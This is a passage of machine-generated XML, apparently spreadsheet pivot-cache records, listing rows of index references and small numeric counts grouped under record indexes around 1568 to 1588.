    <x v="1568"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="1568"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="36"/>
    <x v="1568"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1568"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1568"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1569"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1570"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1571"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1572"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1573"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1574"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1575"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1576"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1577"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1578"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1579"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="21"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1580"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1581"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1582"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="11"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1583"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1584"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1585"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1586"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="18"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="511"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1587"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="4"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1588"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
